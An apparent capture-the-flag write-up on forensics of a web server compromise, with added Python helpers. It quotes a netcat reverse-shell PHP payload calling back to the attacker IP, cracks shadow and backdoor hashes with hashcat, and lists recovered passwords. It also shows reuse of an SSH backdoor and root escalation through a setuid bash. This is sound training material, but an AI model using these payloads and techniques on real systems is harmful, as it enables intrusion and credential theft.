The flags are structured to basically walk us through this room.

Forensics: Analyze the PCAP

I’ve not actually used Wireshark outside of the TryHackMe: Wireshark 101 “room” (and a few short digressions in other rooms), so I’m honestly a little worried about my abilities here…

Filtering the PCAP for HTTP requests (http.request) reveals a single POST from 192.168.170.145 to http://192.168.170.159/development/upload.php. A subsequent request from 192.168.170.145 pulls the directory listing of /development/uploads/, and then GETs /development/uploads/payload.php. This suggests that 192.168.170.145 is the “attacker” and 192.168.170.159 is the target system.

We can save off the body of this POST (File → Export Objects → HTTP) to get at the uploaded payload.php file, which turns out to have the contents:

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

This is the classic netcat reverse shell built on a named pipe (used when nc has no -e): it connects back to 192.168.170.145:4242, which confirms that this was the machine used by the attacker.

This means the initial compromise happens when this file is requested (and executed by the web server) in packet 27.

Looking at the subsequent TCP packets on port 4242, we can see what the attacker typed in the segments going from 192.168.170.145 → 192.168.170.159, and the responses in the segments going from 192.168.170.159 → 192.168.170.145. Because netcat relays the shell's I/O a segment at a time, every data-carrying packet has the TCP PSH flag set, so the display filter tcp.port == 4242 && tcp.flags.push == 1 drops the bare ACKs and zooms in on this conversation. (Right-clicking a packet and choosing Follow → TCP Stream shows the same exchange as a single readable transcript.)

The attacker eventually issues su james to switch to that user (packet 71), and a few packets down we can see james's password typed in the clear.

In packet 112 the attacker cats /etc/shadow, and we get the full dump in packet 114. They then issue git clone https://github.com/NinjaJc01/ssh-backdoor, generate an SSH private key, and switch to the included backdoor binary, at which point we lose the thread (the rest of the session is encrypted SSH).

Returning to packet 114, we can right-click the data and use Copy → …as Printable Text to pull the contents of /etc/shadow (plus a little shell noise around it). After a little cleanup, we have 5 users with password hashes (including james, whose password we already know).

We extract the hashes and throw Hashcat at them using the suggested “fasttrack” wordlist (-m 1800 is sha512crypt, the $6$ format these entries use). If hashes.txt keeps the user: prefix from /etc/shadow, add --username so Hashcat parses the lines; --show --username then prints user:hash:password.

hashcat -m 1800 \
        -O hashes.txt /usr/share/wordlists/fasttrack.txt
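The “little cleanup” step is where mistakes creep in: locked accounts (a leading ! on the hash) and no-password accounts (*, !!) have to be handled, and mixing crypt formats in one -m 1800 run makes Hashcat reject the whole file. The following is an added example, not part of the writeup, that does that cleanup over a constructed shadow dump (placeholder hashes, not the room's real ones, surrounded by the kind of shell noise the Copy → …as Printable Text route produces) and emits ready-to-use hashcat input:

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: a shadow dump as pasted out of the packet bytes, with shell
# noise around it. The hashes are placeholders, not the room's real values.
SAMPLE_DUMP = """\
cat /etc/shadow
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
james:$6$placeholder$FAKEHASH.james/0123456789abcdefghijklmnopqrstuvwxyz:18575:0:99999:7:::
paradox:$6$placeholder$FAKEHASH.paradox/0123456789abcdefghijklmnopqrstuvwx:18575:0:99999:7:::
bee:!$6$placeholder$FAKEHASH.bee/0123456789abcdefghijklmnopqrstuvwxyzAB:18575:0:99999:7:::
legacy:$1$placeholder$FAKEHASH.legacy:18575:0:99999:7:::
nobody:!!:18295:0:99999:7:::
$ 
"""

# Hashcat modes for the crypt(3) prefixes found in /etc/shadow.
CRYPT_MODES = {"$1$": 500, "$5$": 7400, "$6$": 1800, "$2a$": 3200, "$2b$": 3200, "$2y$": 3200}

# user:password:lastchange:min:max:warn:inactive:expire:reserved (9 fields)
SHADOW_LINE = re.compile(r"^([a-z_][a-z0-9_-]*):([^:]*)(?::[^:]*){7}$")


@dataclass
class ShadowEntry:
    user: str
    field: str  # raw password field exactly as found in the dump

    @property
    def locked(self) -> bool:
        # A leading '!' means the account is locked; the hash behind it is still crackable.
        return self.field.startswith("!")

    @property
    def hash(self) -> Optional[str]:
        """Crypt hash with any lock marker stripped, or None for '*', '!!' and empty fields."""
        h = self.field.lstrip("!")
        return h if h.startswith("$") else None

    @property
    def mode(self) -> Optional[int]:
        if self.hash is None:
            return None
        prefix = self.hash[: self.hash.index("$", 1) + 1]  # e.g. "$6$" or "$2b$"
        return CRYPT_MODES.get(prefix)


def parse_shadow(dump: str) -> list[ShadowEntry]:
    """Keep only lines with the 9-field shadow shape; everything else is shell noise."""
    entries = []
    for line in dump.splitlines():
        m = SHADOW_LINE.match(line.strip())
        if m:
            entries.append(ShadowEntry(m.group(1), m.group(2)))
    return entries


def hashcat_input(entries: list[ShadowEntry], mode: int, keep_username: bool = True) -> list[str]:
    """Lines for hashes.txt for one -m mode. With keep_username, run hashcat with --username."""
    lines = []
    for e in entries:
        if e.mode != mode:
            continue  # no password, or a different crypt algorithm that needs its own run
        lines.append(f"{e.user}:{e.hash}" if keep_username else e.hash)
    return lines


if __name__ == "__main__":
    entries = parse_shadow(SAMPLE_DUMP)
    for line in hashcat_input(entries, 1800):
        print(line)
    print("# hashcat -m 1800 --username -O hashes.txt /usr/share/wordlists/fasttrack.txt")
```

Note that bee's entry is locked but still gets cracked once the ! is stripped, and that legacy's $1$ (md5crypt) hash is left out of the 1800 run rather than poisoning it.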

Four out of the five passwords turn out to be crackable:

paradox:secuirty3
szymex:abcd123
bee:secret12
muirland:1qaz2wsx

This ironically doesn’t include james!

Research: Analyze the code

It turns out that https://github.com/NinjaJc01/ssh-backdoor is a real repository, with the code itself living in https://github.com/NinjaJc01/ssh-backdoor/blob/master/main.go.

The hashPassword() function here returns the hex-encoded SHA-512 of the provided password with the salt appended (password + salt, in that order). The default hash is overridden using the -a flag, and we can see that the attacker used this flag when the backdoor was launched in packet 3479.

./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

We can use Hashcat again to crack this. Mode 1710 is sha512($pass.$salt), matching the password-then-salt order in the code, and the hash is supplied as hash:salt using the salt from main.go.

hashcat \
	-m 1710 \
	-O 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05 \
	   ~/.local/share/red-team/wordlists/rockyou.txt
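To see exactly what -m 1710 is checking, here is an added example (not the backdoor's code and not part of the writeup) that reimplements the hashPassword() construction in Python and runs a dictionary attack against it. The captured hash and salt come from the page; the wordlist and the demo password “swordfish” are constructed, so the captured hash is not expected to fall to them. The salt-first variant is included because choosing -m 1720 (sha512($salt.$pass)) by mistake is the usual reason a correct wordlist “fails”:

```python
from __future__ import annotations

import hashlib
from typing import Iterable

# From the capture: the hash passed to -a and the salt hard-coded in the backdoor.
CAPTURED_HASH = "6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed"
SALT = "1c362db832f3f864c8c2fe05f2002a05"


def hash_password(password: str, salt: str) -> str:
    """Same construction as the backdoor's hashPassword(): hex(SHA-512(password + salt)).
    This is what hashcat -m 1710, sha512($pass.$salt), computes."""
    return hashlib.sha512((password + salt).encode()).hexdigest()


def hash_salt_first(password: str, salt: str) -> str:
    """The other common ordering, sha512($salt.$pass), i.e. hashcat -m 1720.
    Picking it by mistake means the right password never matches."""
    return hashlib.sha512((salt + password).encode()).hexdigest()


def crack(target: str, salt: str, wordlist: Iterable[str]) -> str | None:
    """Dictionary attack over wordlist; returns the matching password or None."""
    target = target.lower()
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")  # lines read straight from a wordlist file
        if hash_password(candidate, salt) == target:
            return candidate
    return None


def hashcat_line(target: str, salt: str) -> str:
    """The hash:salt form that -m 1710 expects on the command line or in a hash file."""
    return f"{target}:{salt}"


# Constructed demo: a password we choose, hashed the way the backdoor does it.
DEMO_PASSWORD = "swordfish"
DEMO_HASH = hash_password(DEMO_PASSWORD, SALT)
DEMO_WORDLIST = ["letmein", "password1", "swordfish", "hunter2"]  # stands in for rockyou

if __name__ == "__main__":
    print("demo hash cracked as:", crack(DEMO_HASH, SALT, DEMO_WORDLIST))
    # The captured hash needs a real wordlist, e.g.:
    #   crack(CAPTURED_HASH, SALT, open("rockyou.txt", encoding="latin-1"))
    print("captured hash with the demo list:", crack(CAPTURED_HASH, SALT, DEMO_WORDLIST))
    print("hashcat target:", hashcat_line(CAPTURED_HASH, SALT))
```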

Attack: Get back in!

The last bit of this CTF uses a server, which for this run is at 10.10.114.161. Just visiting that page gives us our first flag.

We’ll get back in using the backdoor that the attacker set up. From the backdoor code we know that its SSH server listens on port 2222, and the password callback never checks the username, so any user name will do. So…

env -u SSH_AUTH_SOCK -u SSH_AGENT_PID \
	ssh -p 2222 user@10.10.114.161

…lets us in as expected with the password we cracked from the -a hash. (Unsetting SSH_AUTH_SOCK and SSH_AGENT_PID just stops our local agent from offering its keys before the password prompt.)

The user flag is in /home/james/user.txt.

Unfortunately, none of the passwords we cracked earlier work anymore. After checking a couple of possible exploits to get around this, I decided just to see what SUID binaries were on the system (figuring that I’d check them against GTFOBins).

find / -type f -perm -u+s -exec ls -l "{}" \; 2>/dev/null

This turned up an unusual file — /home/james/.suid_bash. Could this be… an SUID copy of Bash? Indeed it is!

/home/james/.suid_bash -p # -p keeps the setuid privilege instead of dropping it: root shell!
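Spotting .suid_bash by eye works on a small box; on a real one the question is which of a few dozen setuid files do not belong. The following is an added example, not part of the writeup, that does the same SUID sweep as the find command above and then triages the hits: a file that is byte-identical to a known shell is a planted root shell (run it with -p), and hidden files or setuid binaries under home and temp directories are flagged as out of place. run_demo() builds a constructed stand-in tree (a fake “shell” binary and a hidden setuid copy of it, like the room's .suid_bash) in a temporary directory, since the real system's layout is not reproducible here:

```python
from __future__ import annotations

import hashlib
import os
import shutil
import stat
import tempfile
from typing import Iterable

PSEUDO_FS = ("/proc", "/sys", "/dev")                       # skipped during the walk
ODD_DIRS = ("/home", "/tmp", "/var/tmp", "/dev/shm", "/opt")  # setuid here is suspicious
KNOWN_SHELLS = ("/bin/bash", "/usr/bin/bash", "/bin/sh", "/bin/dash")


def find_suid(root: str) -> list[str]:
    """Regular files with the setuid bit under root, like find / -type f -perm -u+s,
    skipping pseudo-filesystems and ignoring directories we cannot read."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: a symlink to bash is not itself setuid
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def sha256_of(path: str) -> str | None:
    try:
        with open(path, "rb") as f:
            return hashlib.sha256(f.read()).hexdigest()
    except OSError:
        return None


def triage(paths: Iterable[str], known_shells=KNOWN_SHELLS, odd_dirs=ODD_DIRS) -> dict[str, str]:
    """Map each suspicious setuid path to the reason it was flagged."""
    shell_digests = {sha256_of(s): s for s in known_shells if os.path.exists(s)}
    shell_digests.pop(None, None)
    verdict = {}
    for p in paths:
        if sha256_of(p) in shell_digests:
            verdict[p] = f"byte-identical to {shell_digests[sha256_of(p)]}: setuid shell, run it with -p"
        elif os.path.basename(p).startswith("."):
            verdict[p] = "hidden file with the setuid bit"
        elif any(p.startswith(d.rstrip("/") + "/") for d in odd_dirs):
            verdict[p] = "setuid binary outside the system directories"
    return verdict


def run_demo() -> tuple[list[str], dict[str, str]]:
    """Constructed tree: bin/bash (fake contents), a hidden setuid copy of it under
    home/james, and an ordinary setuid helper in bin/. Returns paths relative to the tree."""
    base = tempfile.mkdtemp(prefix="suid-demo-")
    try:
        bin_dir, home = os.path.join(base, "bin"), os.path.join(base, "home", "james")
        os.makedirs(bin_dir)
        os.makedirs(home)
        fake_shell = os.path.join(bin_dir, "bash")
        with open(fake_shell, "wb") as f:
            f.write(b"\x7fELF - constructed placeholder, not a real shell\n")
        hidden = os.path.join(home, ".suid_bash")
        shutil.copyfile(fake_shell, hidden)
        os.chmod(hidden, 0o4755)  # rwsr-xr-x, what the attacker left behind
        helper = os.path.join(bin_dir, "passwd")
        with open(helper, "wb") as f:
            f.write(b"constructed setuid helper\n")
        os.chmod(helper, 0o4755)
        found = find_suid(base)
        flagged = triage(found, known_shells=(fake_shell,), odd_dirs=(os.path.join(base, "home"),))
        rel = lambda p: os.path.relpath(p, base)
        return [rel(p) for p in found], {rel(p): why for p, why in flagged.items()}
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    found, flagged = run_demo()
    print("setuid files:", found)
    for path, why in flagged.items():
        print(f"  {path}: {why}")
```

Against a live host, call find_suid("/") and triage() with the defaults; the content comparison only catches an unmodified copy of an installed shell, so anything in the hidden or odd-location buckets still deserves a look in GTFOBins.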

The root flag is then in /root/root.txt.

Elapsed Time: 1 h 43 min